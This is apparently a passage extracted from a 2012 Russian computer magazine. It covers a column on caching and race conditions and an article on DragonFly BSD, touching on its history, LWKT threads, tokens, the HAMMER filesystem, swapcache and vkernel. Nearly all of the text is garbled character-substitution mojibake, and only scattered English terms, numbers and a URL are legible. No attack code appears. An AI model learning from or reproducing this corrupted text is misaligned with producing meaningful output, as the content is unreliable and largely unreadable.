J)(-'* #"83 . 7.(:"0: #"2. "%,*-".2"4 '#/ : 9*9:24,(*> "8,-(.@0, !0 ,."':#8# 9*2:<.83 8-' (-10!-#70# race condition ("*"8*4(.# 6*(*'), 8* #"83 ".8:-@.A, '*6)- &8*8 "-70> '#/ %:)#8 *)(*!,#7#((* !0<."2483"4 (#"'*23'.7. 9,*@#""-7. ((#"'*23'* 9*231*!-8#2#> ,#/.2. *%,-8.83-"4 ' (*!07 )-((07). ? .8*6# !-/- "."8#7- 1-(.7-#8"4 )*!*23(* 9:"8*> )#48#23(*"83A — *)(*!,#7#((07 !0<."2#(.#7 n-6* '*2.<#"8!- *).(--'*!0$ )-((0$.

J).( .1 !0$*)*! — *)(*!,#-7#((*# ."9*231*!-(.# (#"'*23'.$ 9*)$*)*!. ?0 (# 9,*"8* "8.,-#8# :"8-,#!/## 1(-<#(.# .1 '#/-, - 8*23'* 9*7#<-#8# #6* '-' :"8--,#!/## . *)(*!,#7#((* "8-!.8# 1-)-<: ! *<#,#)3 (- 9#,#"<#8 (*!*6* 1(-<#(.4. =*'- 1-)-(.# ! *<#,#). *%,-%-80!-#8"4, 9*231*!-8#2A *8)-#8"4 :"8-,#!/## 1(-<#(.#. K8* (-10!-#8"4 )#6,-)-@.4 L:('@.*-(-23(*"8.: !0 "*1(-8#23(* .)#8# (- 8*, <8* (#'*8*,0# .1 9*231*!-8#2#> 9*2:<-8 (# "-70# "!#5.# )-((0#. P*23/.("8!* "."8#7 " 9,*):7-((*> %.1(#"-2*6.'*> .7#A8 ! -,"#(-2# 9*-)*%(0> 9*)$*).

)(*+,#-% !2%(2% ! $#)(*3(#24- '#1#-E;# *)(- 9,*%2#7- — "8-,8 " (#-9,*6,#807 (8* #"83 (#1-9*2(#((07) '#/#7. Q-'-4 ".8:-@.4 (-624)(* .22A"8,.,:#8 :8!#,5)#(.# * 8*7, <8* '#/ (# 7*5#8 ,#/.83 9,*%2#7: 7#)2#((*> %-10 )-((0$.

=,#)9*2*5.7, <8* !-7 (:5(* 9*'-1-83 9*231*!-8#247 20 "-70$ $*,*/.$ 9*"8*! 1- '-'*>-2.%* 9#,.*). K8- .(L*,7-@.4 %02- : !-" ! '#/#, (* ' 7*7#(8: 1--9:"'- "."8#70 '#/ %02 *<.;#(. O**8!#8"8!#((*, !"# 9*231*!-8#2. *%,-;-A8"4 ' %-1# )-((0$, '*8*,*> )24 9*"8,*#(.4 .()#'"- (:5(*, "'-5#7, 500 7.22."#':(). ? .8*6# !"# (-<.(-#8 7#)2#((* ,-%*8-83, . !0 "-7. "#%# ")#2-2. DoS (Denial-of-service). O->8 (# ,-%*8-#8.

J8"A)- !0!*): (# 1-(.7->8#"3 '#/.,*!-(.#7, 9*'- : !-" (# ,#-/#(0 ),:6.# 9,*%2#70. O)#2->8#, <8*%0 %-1- %0"8,* ,-%*8-2-, . !-7 (# (:5(* %:)#8 !**%;# !*1.83"4 " '#/.,*!-(.#7. Q#7 (# 7#(## )-5# : 9,*%2#70 "8-,8- " (#1-9*2(#(-(07 '#/#7 #"83 ,#/#(.4:1. I"9*231*!-83 '#/-$,-(.2.;#

" 1-9."3A (- )."' (8#,4#7 ! "'*-,*"8.);

2. ?,:<(:A 1-9*2(483 '#/ 9#,#) "8-,8*7 (9*231*!-8#2. 5):8 . (#6*):A8);

3. =:"'-83 9*231*!-8#2#> (- "->8 9-,8.47. (9*231*!-8#2. !"# 8-' 5# 5):8 . (#6*):A8).

H-' !.).8#, 2A%*> "9*"*% 92*$, 9*&8*7: 2./3 9*!8*,.7"4: "8-,->-8#"3 ")#2-83 8-', <8*%0 !-/- "."8#-7- ,-%*8-2- . %#1 '#/.,*!-(.4 . z

&%'#( 09 /164/ 2012108

%'%0#-.5

)6789:;< =>?<9=@<A== B:C<

• J%(*!2#(.# 9* 1-9,*": (9,*%2#7- race condition )24 (-6,:5#((0$ "8,-(.@);• G*(*!*# *%(*!2#(.#

http://shop.glc.ru

!"# $"#%& #'(")*+",%: «- $./ '(.*/01.#%+& '&2'*#3*?» !"-#$%&'(, )*" &'+",-". ."*$%/&01$ 2"&$2*3 %42#%"2*%4-1-*$51 -$ 2*$2-/6*2/ #%",4&4*3 78%-45 94 300 %8:5$; 1 &'0$. !"-&*"%'(, )*" 8,":-". <$ -4," 12=4*3 78%-45 & #%",47$1 :"/*32/ #%">"%+4*3 >">$-*, ="+,4 &$23 *1%47 87$ %49:$%8*. !-*%$*31(, )*" :'2*%" (#%4&,4, )*" #%4&15" ,$;2*&8$* -$ ,5/ &2$(): #",#12?1=4> 2&$71; &'#82= "*#%4&5/$*2/ %4-30$, ?$> "- #"/&5/$*2/ -4 #%154&=4( >4+491-"&.

166 !"#$%& '( )*+%!!

6 +%,-.%/ 1110 !. 12 +%,-.%/ 1999 !.

01203456

@4+491- #",#12=1

UNIXOID !"#$%&' ()*%&% (execbit.ru)

!"#$% 09 /164/ 2012110

!"#$% & 2003 #"$' ()*+, -.//"0 "123&./ " 0%4%/5 6%1"*7 0%$ 8"18*&50079 :"6;"9 FreeBSD 4 8 %;<50*"9 0% =6"8*"*' $.>%?0% . 90"#"=6"<588"6075 8.8*597, 0.;*" 5#" >%*5, &856+5> 05 &"8=6.03/ . 90"#.5 «8=5<7» =65$65;%/., 4*" 8;"6" )0*'>.%>9 >%;"04.*83 . =6"5;* >%;6",*. @59 05 95055 DragonFly BSD "8*%&%/%8+ 0% =/%&' 90"#.5 #"$7 . >% &"859+ /5* =65&6%*./%8+ & "$0' .> 8%97A .0*565807A UNIX-="$"107A 8.8*59 8"&659500"8*..

!"#$%&'( &'%$#()*!"#!$ %&'()*+, !-!")..!-/)0 !1)$234!..!0 -4-/)5+ DRAGONFLY BSD

!"#$%&'( )$*+,%-.

!"#$% 09 /164/ 2012 111

!"#$%&'( — &)*+*(,-./0 "(,*12(. DragonFlyBSD 3&.)*45#("&# *.1"(,,6"&#( DragonFlyBSD

//010230 3)$%*'( DragonFly BSD "#4#5#)6 ) *#-"%75#)'8, ' 9)+ :%)5+-;<=>++ *#-9'$'+ %:+*#?'%""%8 )')$+&. :%;9+*7#5%)6 ,*'$',+ ' "+%@%)"%9#"".& "#:#;,#&. 1%57%+ 9*+&( 1'55%"# %@9'"(5' 9 $%&, 4$% %" )5'A,%& #&@'?'%-+", 5%&#+$ $*#;'?'' ' 9%%@>+ '-%@*+$#+$ 9+5%)':+;. 2+%;"%,*#$"% +&< :*'B%;'5%)6 %@C()"($6 %4+*+;".& ,%")+*9#$%*#&, :%4+&< BSD ;%5D"# %$%8$' %$ :*+D"'B )$+*+%$':%9 *#-9'$'( ' :%8$' :% :<$' '""%9#?'8. E.5' "#:')#". ,'5%&+$*. :')+&, '"$+*96=, )$#$+8, )%$"' $.)(4 )$*%, ,%;#, "% DragonFly BSD $#, ' %)$#9#5#)6 :*%$'9%*+4'9.& :*%+,$%&, %$ ,%-$%*%7% < &%5%;+D' -#7%*#5')6 75#-#, # 9+$+*#". ),*':+5' -<@#&'.

3&+""% )$*+&5+"'+ )5%&#$6 )$+*+%$':. ' ,%*+"".& %@*#-%& '-&+"'$6 9)+, "#4'"#( %$ :%;B%;# , *#-*#@%$,+ ' -#,#"4'9#( :*'"?':#&' *#@%$. FG, );+5#5' DragonFly BSD )$%56 '"$+*+)"%8 %:+*#?'%""%8 )')$+&%8. DragonFly 9"+)5# 9 )%%@>+)$9% BSD $%, 4+7% +&< $#, ;#9"% "+ B9#$#5%, 95'5# )9+D<= ,*%96 ' "#&+$'5# :<$6 , '""%9#?'(&. /"<$*' H$%8 )')$+&. ,*%+$)( )$%56,% '"$+*+)-".B ' "+)$#";#*$".B ';+8, 4$% ;#D+ Linux, ) +7% &#"'+8 #,,<&<5'-*%9#$6 9"<$*' )+@( )#&.+ :*%$'9%*+4'9.+ *#-*#@%$,', ,#D+$)( "# ++ I%"+ ),<4".& ' %@.;+"".&.

G,5#;.9#+$)( 9:+4#$5+"'+, 4$% JH$6= 1'55%" 9%%@>+ "+ -"#+$ )5%9# «,%")+*9#$'-&». F" ):%,%8"% '-@#95(+$)( %$ 9+>+8, ,%$%*.+, "# +7% 9-75(;, "+ "<D"., ' ;%@#95(+$ 9 )')$+&< I<",-?'%"#56"%)$6, 9.-.9#=><= &"%D+)$9% ):%*%9. F" @+- -#-*+"'( )%9+)$' 9.,';.9#+$ '- (;*# ?+5.+ :%;)')$+&. ' -#&+"(+$ 'B #"#5%7#&'. K#D+$)(, 4$% %" :*%)$% 9.:5+),'9#+$ ';+' 9 ,%;, "% < "+7% 9)+7;# +)$6 :5#" *#-9'$'( "# &"%7'+ 7%;. 9:+*+;. 07% @+--7*#"'4".8 H"$<-'#-& ' ,*+#$'9"%)$6 -#D'7#=$ <&. )%$+" ;*<7'B *#-*#@%$4',%9, ,%$%*.+ :*+;5#7#=$ ' *+#5'-<=$ )%@)$9+"".+ ';+', 9% &"%7%& :*%$'9%*+4'9.+ ' ):%*".+, "% HII+,$'9".+ ' '"$+*+)".+.

DragonFly — H$% %@*#$"#( )$%*%"# BSD, 5'A+""#( "+:*%B%;'-&%7% ,%")+*9#$'-&# ' "#:%5"+""#( ;<B%& #,#;+&'4+),%8 )')$+&., 9 ,%$%*%8 :%5"% "%9.B ';+8 ' *#-*#@%$%,, )%-;#"".B @+- %75(;,' "# :*%9+*+"".+ 9*+&+"+&, "% 9% &"%7%& "+HII+,$'9".+ *+A+"'(. 3 :<)$6 :%,# DragonFly "+ :%,#-.9#+$ 9:+4#$5(=>'B *+-<56$#$%9 9 $+)$#B :*%'-9%;'$+56"%)$' ' "+ &%D+$ :*+;5%D'$6 -#,%"4+""%+ *+A+"'+ ;5( 9"+;*+"'( 9 :*%;#,A", 9)+ :*+;:%).5,' ;5( H$%7% < )')$+&. +)$6, # 1'55%" ;#D+ "+ )%@'*#+$)( %)$#"#95'9#$6)( "# ;%)$'7"<$%&.

2!L!MF 2!L!M, 3M3 JNMOP3Q10R2ST ENJ U*+;:%).5,%8 , *%D;+"'= DragonFly )$#5' *#-"%75#)'( JH$6= 1'55%"# ) ,%&#";%8 *#-*#@%$4',%9 FreeBSD :% :%9%;< &+B#"'-&%9 *#@%$. )')$+&. "# &"%7%(;+*".B/&"%7%:*%?+))%*".B )')$+&#B. N4#)$"',' FreeBSD Core Team :*';+*D'9#5')6 $*#;'?'%""%-7% :%;B%;# , %@+):+4+"'= HII+,$'9"%8 *#@%$. %:+*#?'%""%8

)')$+&. ) &"%7'&' (;*#&'. V5#9"#( ';+( H$%7% :%;B%;# )%)$%'$ 9 '):%56-%9#"'' @5%,'*%9%, 9+-;+, 7;+ $%56,% &%D+$ 9%-"',"<$6 :*%@5+&# %;"%9*+&+""%7% ;%)$<:# , *+)<*)#&. W$% :%-9%5(+$ :5#9"% :+*+"+)$' )')$+&< "# "%9.+ :*%?+))%*., "+ "#*<A'9 *#@%$< ,5=4+9.B ,%&:%"+"$%9 (;*#. 1'55%" D+, "#:*%$'9, @.5 <@+D;+", 4$% &"%7%(;+*".+ )')$+&. $*+@<=$ ,%*+"".B '-&+"+"'8 9 (;*+ ;5( $%7%, 4$%@. FG &%75# HII+,$'9"% '):%56-%9#$6 9)+ *+)<*). )')$+&. ' :*' H$%& "+ *#-*%)5#)6 9 @%56A%8 ,<)%, ,%;#, "#:%5"+"".8 9-#'&%-#9')'&.&' @5%,'*%9,#&' ' $*+@<=>'8 )+*6+-".B -#$*#$ "# )%:*%9%D;+"'+ ' *#-9'$'+. K%")+*9#$'-& :%@+;'5, ' 1'55%" )%-;#5 )%@)$9+"".8 I%*, FreeBSD, 75#9"%8 %)%@+""%)$6= ,%$%*%7% ' )$#5 )%9+*A+""% "%9.8 :%;B%; , *#@%$+ )')$+&. ) &"%7'&' :*%?+))%*".&' (;*#&'.

L$%@. :%"($6, 4$% :*+;5%D'5 1'55%", "+%@B%;'& "+@%56A%8 H,),<*) 9 $+%*'=. SMP-)')$+&. %$5'4#=$)( $+&, 4$% '&+=$ +;'"%+ #;*+)"%+ :*%)$*#")$9% ;5( 9)+B :*%?+))%*".B (;+*. 1*<7'&' )5%9#&', 9)+ (;*# '):%56-<=$ %;"< :#&($6, ,%$%*#( "',#, &+D;< "'&' "+ ;+5'$)(, 9)+& ;%)$<:"% 9)+. F$)=;# 9%-"',#+$ %4+9';"#( :*%@5+&#: 4$% @<;+$, +)5' ;9# :%$%,# '):%5"+"'( (;*# :%:.$#=$-)( :%5<4'$6 ;%)$<: '5' '-&+"'$6 %;"< ' $< D+ )$*<,$<*< ;#"".B (-"#4+"'+ :+*+&+""%8 sysctl, "#:*'&+*) %;"%9*+&+""%? F$9+$: 9%--"',"+$ ,%55'-'( (:%$%,, ,%$%*.8 ;%5D+" @.5 );+5#$6 H$% 9$%*.&, &%D+$ );+5#$6 H$% :+*9.& '5' "#%@%*%$, )% 9)+&' 9.$+,#=>'&' %$)=;# :%)5+;)$9'(&'). G#&%+ :*%)$%+ *+A+"'+ H$%8 :*%@5+&. — -#:*+$'$6 '):%5"+"'+ 9)+7% ,%;# (;*# %;"%9*+&+""% "+),%56,'&' :*%?+))%*#&' ) :%&%>6= 75%@#56"%8 @5%,'*%9,' (Big Giant Lock), ,#, ' @.5% );+5#"% 9 FreeBSD 4. U%,# %;'" :*%?+))%* '):%5"(+$ ,%; (;*#, 9$%*%8 D;+$.

G#&% )%@%8, :%;B%; H$%$ "+HII+,$'9+", ' 9 FreeBSD 5 @.5% -#-:5#"'*%9#"% "#4#$6 :%)$+:+""%+ '-@#95+"'+ (;*# %$ 75%@#56"%8 @5%,'*%9,' ) :%&%>6= @%5++ <-,%):+?'#5'-'*%9#"".B @5%,'*%-9%,, ,%$%*.+ @<;<$ <)$#"%95+". "# 9)+ ),%56,%-"'@<;6 -"#4'&.+ )$*<,$<*. ;#"".B. P#, ,%; (;*# &%7 '):%5"($6)( "+),%56,'&' :*%-?+))%*#&', # D;#$6 :*'B%;'5%)6 $%56,% 9 )5<4#+ %;"%9*+&+""%7% ;%)$<:# , %;"'& ' $+& D+ )$*<,$<*#& ;#"".B. U*%@5+&# $#,%7% :%;B%;# )%)$%(5# 9 $%&, 4$% '---# @5%,'*%9%,, 9%-:+*9.B, ,%; (;*#

DRAGONFLY — !"# #$%&"'&( )"#%#'& BSD, *+,-''&( '-.%#/#0+1#2# 3#')-%4&"+51&

UNIXOID

!"#$% 09 /164/ 2012112

!"#$"%&%'() $ *"+,+ -.,% ( /0.1#(2$./ '.-.$, 30%452#'60%) 4%(26 -.2."78 - 2./+ 1# 3%$5(#'5 ,"+* .2 ,"+*%, 2%- 42. !"58.,5'.(6 *.-".,526 -+4+ -.(27'#9. :.-$2."78, -., (2%0.$5'() /%'.;<<#-25$-07/, 2%- -%- ='.-5".$-5 !"5/#0)'5(6 !.$(#/#(20. 5 =#3 "%(4#2%, 42. .!"#,#'#007# 25!7 ,%0078 $ !"50>5!# 0# /.*+2 5/#26 !".-='#/ ( .,0.$"#/#007/ ,.(2+!./, !.(-.'6-+ %-2+%'607 2.'6-. ,') .,0.*. !".>#((."0.*. ),"%. ?%4#/, 0%!"5/#", ='.-5".$%26 ,.(2+! - (2"+-2+"# ,%0078 !".>#((%, #('5 - 0#/+ 8.4#2 !.'+4526 ,.(2+! !".>#((, "%=.2%@&59 0% 2./ 1# ),"#? A.,8., ( 5(!.'63.$%05#/ ='.-5".$.- $..=&# 0# "%((452%0 0% 2%-5# (52+%>55 5 2"#=+#2, 42.=7 (2"+-2+"% ,%0078 =7'% 3%='.-5".$%0% $ '@=./ ('+4%#.

B5''.0 !"#,'.15' "#C526 ;25 5 ,"+*5# $.3/.107# !".='#/7 ( !./.&6@ 2"#8 -'@4#$78 5,#9: !"5$)3-5 ,%0078 - !".>#((."%/, (..=&#059 5 /)*-58 ='.-5".$.-. A#"$%) 5,#) — !#"#!5(%26 ),". ( +4#2./ 2.*., 42. !".>#((7, "%=.2%@&5# 0% .,0./ !".>#((."#, 0# 2"#=+@2 -%-58-'5=. $3%5/078 ='.-5".$.-. B') ;2.9 >#'5 =7'% "#%'53.$%0% 5,#) '#*-.$#(078 052#9 ),"% (LWKT), !. .,0.9 0% -%1,79 !".>#(( $ (5(2#/#, 5 .2,#'6079 !'%05".$&5- 0% -%1,79 !".>#((.". B') ,.(2+!% - ,%007/ ,"+* ,"+*% 0525 5(!.'63+@2 /#-8%053/ (..=&#059, -.2."79 !.3$.')#2 53=#1%26 ='.-5".$.-, .=#-(!#45$%#2 !"%$5'60+@ !.('#,.$%2#'60.(26 $7!.'0#05) .!#"%>59 ,.(2+!% 5 0# 0%-'%,7$%#2 05-%-.*. .$#"8#,% !"5 .=/#0# ,%007/5 /#1,+ 052)/5, "%=.2%@&5/5 0% .,0./ !".>#((."#.

D.2 1# !.,8., =7' !"5/#0#0 -. /0.*5/ ,"+*5/ !.,(5(2#/%/ ),"%, 0%!"5/#", $0+2"5),#"079 %''.-%2." !%/)25 =7' "%3,#'#0 0% 0#(-.'6-. -.!59, !. -.'54#(2$+ !".>#((.".$, 2%-, 42. !".>#(( $7,#'#05) !%/)25 5 "%=.27 ( 0#9 0# 2"#=.$%' ='.-5".$.-. E., (#2#$.9 !.,(5(2#/7 2%-1# =7' "%3,#'#0 0% 0#(-.'6-. !.2.-.$, "%=.2%@&58 0% "%3078 ),"%8. : ,%'60#9C#/ 2%-5/ 1# .="%3./ =7'5 !#"#!5(%07 5 ,"+*5# !.,(5(2#/7, $-'@4%) !.,(5(2#/+ $$.,%-$7$.,% 5 VFS. F=&%) 5,#) (.(2.)'% $ 2./, 42. #('5 27 8.-4#C6 !.'+4526 ,.(2+! - ,%007/, 2. !".(2. !.(7'%#C6 (..=&#05# 5 !.'+4%#C6 58 $ .2$#2 =#3 0#.=8.,5/.(25 !"5/#0#05) -%-58-'5=. ='.-5".$.-.

: ('+4%# ( ,%007/5, .=('+15$%#/7/5 -."0#$7/5 -./!.-0#02%/5 ),"% 5 %-2+%'607/5 ,') $(#9 (5(2#/7 $ >#'./ (2# 1# !#"#/#007# sysctl, 0%!"5/#"), !"5/#0)'() ,"+*.9 !.,8.,: ,') ='.-5".$-5 ,%0078 5(!.'63.$%'%(6 (5(2#/% (#"5%'53+@&58 2.-#0.$. A.)(0526, -%- .0% "%=.2%#2, /.10. 0% !"5/#"# .4#"#,5 $ -%=50#2 - (2./%2.'.*+. G('5 .,50 !.2.- 5(!.'0#05) 8.4#2 !.-'+4526 ,.(2+! - ,%007/, .0 =#"#2 2.-#0 (2%'.0) 5 1,#2, !.-% ,"+*.9 !.2.-, $3)$C59 2.-#0 0% ,.(2+! - 2#/ 1# ,%007/, 0# .($.=.,52

58 5 0# $#"0#2 2.-#0. G('5 4#'.$#- 3%,#"1%'() *,#-2. $ ,"+*./ /#(2#, $(# .(2%'607# '@,5 0# =+,+2 3%='.-5".$%07 $ #*. .15,%-055, — .0 !".(2. !.2#")#2 ($.# /#(2. $ .4#"#,5, 5 #/+ !"5,#2() !./#0)26 2%'.0, -.*,% .0 .($.=.,52(). A"5/#052#'60. - DragonFly ;2. 30%452, 42. !.2.-, 5/#@&59 2.-#0, 0. 3%='.-5".$%0079 !. ,"+*.9 !"5450# 5'5 (!)&59, $"#/#00. 2#")#2 2.-#0 5 !"5.="#2%#2 #*. $0.$6, -.*,% =+,#2 "%3='.-5".$%0. H2. .4#06 $%10.# .2'545# 2.-#0.$ .2 ='.-5".$.-, -.2.".# !.3$.')#2 /%'.9 -".$6@ 53=#1%26 *'%$0.9 !".='#/7 FreeBSD 5 ,"+*58 FI, 5(!.'63+@&58 2"%,5>5-.007# ='.-5".$-5, !., 0%3$%05#/ deadlock, ,') .=8.,% -.2.".9 !"5/#0)#2() /0.1#(2$. -.(27'#9.

J02#"#(0., 42. $ "#3+'62%2# "%3,#'#05) ),"% 0% .2,#'607# !.2.-5, ,.(2+! - -.2."7/ .(+&#(2$')#2() ( !./.&6@ (..=&#-059, DragonFly !"5.="#'% 0#-.2."7# 4#"27 /5-".),#"078 FI. D#!#"6 /.10., $.-!#"$78, '#*-. !#"#0#(25 !.,(5(2#/7, ,"%9$#"7 5 <%9'.$7# (5(2#/7 (58 2.1# !'%05"+#2() $70#(25 $ .2,#'607# !.2.-5) $ !".(2"%0(2$. !.'63.$%2#'), 42. (+&#(2$#00. !.$7(52 (2%=5'60.(26 "%=.27 FI. :.-$2."78, ,%"./ !.'+4526 $.3/.10.(26 %(508".00.*. $7!.'0#05) ,.(2+!% - ,%007/, 0%!"5/#" 0#='.-5-"+@&59 $$.,-$7$.,.

HAMMER :2."%) $%10%) 5,#), -.2."%) '#*'% $ .(0.$+ DragonFly, — ;2. $.3-/.10.(26 53 -.".=-5 "%=.2%26 $ -'%(2#"%8. I ;2.9 >#'6@ B5''.0 (.=5"%#2() 3%,#9(2$.$%26 $(# 2.2 1# /#8%053/ (..=&#059, -.2.-"79 !.3$.'52 "%(!%"%''#'526 ),". 0# !".(2. 0% 0#(-.'6-. !".->#((."078 ),#", 0. 5 0% 0#(-.'6-. <5354#(-58 /%C50. : -%4#(2$# (#2#$.*. 8"%05'5&% $ -'%(2#"# =+,#2 5(!.'63.$%26() "%(!"#,#-'#00%) <%9'.$%) (5(2#/% HAMMER, -.2."%) +1# (#94%( !./#4#0% -%- (2%=5'60%) 5 $8.,52 $ (.(2%$ DragonFly !. +/.'4%05@.

:. /0.*./ HAMMER 0%!./50%#2 +1# 30%-./7# 0%/ <%9'.$7# (5(2#/7 ZFS 5 Btrfs, 0. .2'54%#2() %"852#-2+".9 5 ,53%90./. F(0.$07# $.3/.10.(25 ;2.9 KI:• !.,,#"1-% 0#.*"%054#00.*. -.'54#(2$% (0%!C.2.$;• $.((2%0.$'#05# .C5=.- $. $"#/) /.025".$%05)

=#3 5(!.'63.$%05) fsck;• 50-"#/#02%'60.# 3#"-%'5".$%05# ,%0078 0% !.,450#007# +3'7;• -.02".'607# (+//7 ,') .=#(!#4#05) >#'.(20.(25

,%0078 5 /#2%,%0078;• %$2./%254#(-%) ,#,+!'5-%>5) ,%0078

(.,50%-.$7# ='.-5 ,%0078 =+,+2 .=L#,50#07 $ .,50);• /%-(5/%'6079 "%3/#": 1 ;-3.=%92.

A"5 ;2./ HAMMER — !.'0.(26@ "%(!"#,#'#00%) KI, -.2."%) !.-3$.')#2 .=L#,50526 8"%05'5&% ,%0078 /0.1#(2$% /%C50 $ #,50+@ KI ( *%"%025#9 $7(.-.9 ,.(2+!0.(25 5 (.8"%00.(25 ,%0078 ( !.-/.&6@ ,+='5".$%05). : 0%(2.)&59 /./#02 <%9'.$%) (5(2#/% /.1#2 "%=.2%26 2.'6-. $ "#15/# «.,50 /%(2#" — /0.*. !.,450#0078», 42. (+&#(2$#00. .*"%0545$%#2 .='%(25 ## !"5/#0#05), .,0%-. $ HAMMER2, "%=.2% 0%, -.2.".9 5,#2 !.'07/ 8.,./, ;2. .*"%054#-05# =+,#2 (0)2., 5 KI (/.1#2 "%=.2%26 $ /+'625/%(2#"-"#15/#.

J02#"#(0. 2%-1#, 42. HAMMER 0# )$')#2() <%9'.$.9 (5(2#-/.9, "%=.2%@&#9 !. !"50>5!+ copy-on-write, !.;2./+ /#8%053/

!"# $%&'()*+, (' HAMMER -).)/(#&,/0(1, "'2-,/1 3$-$& "'24,5,(1 * .%,*-)"'2-,/'6 %#%&,41 HAMMER, ('21*',416 PFS7'8/)*'9 %#%&,4' HAMMER #%.)/02$,&%9 .) $4)/:'(#;

! "#$%&'()(# ")$*#&#+,- -*") +) .(*#&'+/# 0.(.1, DRAGONFLY 0",.2"#&) 3#"(/ 4,1".-*#"+/5 .6

!"#$%&'( )$*+,%-.

!"#$% 09 /164/ 2012 113

!"#$% &'(()* +,( -'.)/) '0-123#*,4 /)*#.'+$%#).)4 FreeBSD, 5(6 /)#).)7 )* 8.9/#':23/' 3 *;(6 82.28'39( 13% 8)53'3#24; ;8.91(2*'6 1'.#;9($*)7 8946#$%, 9 #9/<2 1*23 +)($-'2 8)8.91/' 1 5.;='2 8)53'3#24,. > 31)2 1.246 +,( 0942#*)7 ?'=;.)7 1 /.;=9@ .90.9+)#:'/)1 5(6 82.3)*9($*)=) /)48$%#2.9 Amiga — '0 2=) )82.9-A')**)7 3'3#24, &'(()* 8):2.8-*;( 4*)<23#1) '527, /)#).,2 09-#24 (2=(' 1 )3*)1; DragonFly BSD. B/)*:'( ;*'12.3'#2# C2./(' 1 D9('?).*'', =52 182.1,2 ' 8)-0*9/)4'(36 3 BSD-3'3#2494'.

!"#$% &'(()*

)%-/#"'( )"#01%$%2 2 "+3 *+#4'-%2#" 0%-/*56%&5. 7*' )%-/#"'' )"#01%$# 0*%)$% 0*%')8%/'$ -#&%*%-,# 2)+8 /#"".8, # '-&+"+-"'( %)59+)$24(:$)( 5;+ 2 "%2.8 <4%,#8. =# $#,%& ;+ 0*'">'0+ %)"%2#" &+8#"'-& 2+/+"'( ')$%*'', ,%6/# )"#01%$. )%-/#:$)( ) 0%&%9?: ,%&#"/, 0*%0')#"".8 2 cron.

@)4' 6%2%*'$? % 0*%'-2%/'$+4?"%)$', $% 2 /#"".3 &%&+"$ HAMMER "+ &%;+$ 0%82#)$#$?)( 2.)%,'&' ),%*%)$(&'. A"# <.-)$*++ )$#"/#*$"%3 B#34%2%3 )')$+&. UFS, "% 6%*#-/% &+/4+""++ ZFS, Btrfs ' ext4. CD$?: E'44%" 5;+ -#$+(4 <%4?1%3 *+/'-#3" B#34%2%3 )')$+&. 2 *#&,#8 0*%+,$# HAMMER2, 2 *+-54?$#$+ ,%$%*%3 %"# )$#"+$ "#)$%(9+3 copy-on-write B#34%2%3 )')$+&%3 ' 4'1'$)( &"%6'8 )2%'8 "+/%)$#$,%2, %/"#,% %;'/#$? ++ 0%(24+-"'( )$%'$ "+ *#"?1+ 2013 6%/#.

FGHIJ!KL=A@ MEHA, SWAPCACHE G N!CAHANO! 7HAP@QQAF =# )%%<9+"'(8, 4+6,%2+)".8 "'$(8 (/*# ' ,4#)$+*"%3 B#34%2%3 )')$+&+ "%2%22+/+"'( ' %)%<+""%)$' DragonFly "+ -#,#"R'2#:$)(. N/+)? +)$? &"%;+)$2% /*56'8 2+)?&# 4:<%0.$".8 ' 0%4+-".8 '/+3, % ,%$%*.8 *#-*#<%$R',' /*56'8 )')$+& /#;+ "+ -#/5&.2#:$)(. =#'<%4++ '"$+*+)".+ '- "'8 — D$% 2'*$5#4?"%+ (/*%, )0%)%<"%+ *#<%$#$? ,#, 0%4?-%2#$+4?),'3 0*%>+)), /*#32+* /4( 2."+)+"'( &+$#/#"".8 B#34%2%3 )')$+&. "# /*56%3 "#,%0'$+4? swapcache ' &+8#"'-& -#&%*%-,' 0*%>+))%2, 0%-2%4(:9'3 )%8*#"'$? $+,5-9++ )%)$%("'+ 0*'4%;+"'( 2 B#34.

F'*$5#4?"%+ (/*% 0*+/)$#24(+$ )%<%3 )0%)%< -#05),# (/*# DragonFly 2 0*%)$*#")$2+ 0%4?-%2#$+4( ) D&54(>'+3 "#,%0'$+4+3 0*' 0%&%9' /'),%2.8 %<*#-%2 ' 2'*$5#4'-#>'+3 )+$' 0*' 0%&%9' tap-'"$+*B+3)#. F )2%+ 2*+&( E'44%" *+#4'-%2#4 D$5 $+8"%4%6': /4( 50*%9+"'( %$4#/,' (/*# ' $+)$'*%2#"'( ,4#)$+*"%3 B5",->'%"#4?"%)$', %/"#,% %"# $#,;+ &%;+$ <.$? ')0%4?-%2#"# /4( 2'*$5#4'-#>'' "#*#2"+ ) 0%/)')$+&%3 Jail. F'*$5#4?"%+ (/*% ,%&-0'4'*5+$)( 2&+)$+ ) %)"%2".& ' 0%&+9#+$)( 2 ')0%4"(+&.3 B#34 /var/vkernel/boot/kernel/kernel, ) 0%&%9?: ,%$%*%6% +6% &%;"% -#05)$'$?, 5,#-#2 0*' "+%<8%/'&%)$' -#6*5-%R".+ /'),' ' %$,%"-B'65*'*%2#2 2'*$5#4?"5: )+$?.

@9+ %/"# '"$+*+)"#( %)%<+""%)$? )')$+&., ,%$%*#( 0%(2'4#)? 2 DragonFly 2.6, — D$% &+8#"'-& swapcache, 0%-2%4(:9'3 ,+1'-*%2#$? /#"".+ ' &+$#/#"".+ B#34%2%3 )')$+&. 2 swap-*#-/+4+ $2+*/%$+4?".8 /'),%2. A)"%2"#( '/+( 0*' D$%& -#,4:R#+$)( 2 $%&, R$% SSD-/'),' 0% %0*+/+4+"': <.)$*++ %<*#<#$.2#:$ %0+*#>'' 22%/#-2.2%/# ' 0%D$%&5 &%65$ <.$? ')0%4?-%2#". /4( 5),%*+"'( /%)$50# , R#)$% ')0%4?-5+&.& /#"".& ' &+$#/#"".&. F 0+*25: %R+*+/? swapcache %*'+"$'*%2#" "# 0*'&+"+"'+ 2 )')$+&#8 ) "+-<%4?1'& ,%4'R+)$2%& %0+*#$'2"%3 0#&($', ,%$%*%3 &%;+$ 0*%)$% "+ 82#$'$? /4( 0%)$%(""%6% 8*#"+"'( ,+1# B#34%2%3 )')$+&.. F D$%& )45R#+ swapcache 0%-2%4(+$ /%)$'6"5$? 8%*%1+6% <#4#")# &+;/5 ,%4'R+)$2%& 0#&($', )2%<%/".& /4( 0*'4%;+"'3, ' 0*%'--2%/'$+4?"%)$?: *#<%$..

C+8#"'-& )%8*#"+"'( )%)$%("'( 0*'4%;+"'3 — +9+ %/"# 4:<%0.$"#( %)%<+""%)$? DragonFly. Q +6% 0%&%9?: 0%4?-%2#$+4? 2 4:<%3 &%&+"$ &%;+$ -#&%*%-'$? 0*%>+)) ' *#-&+)$'$? +6% %<*#-

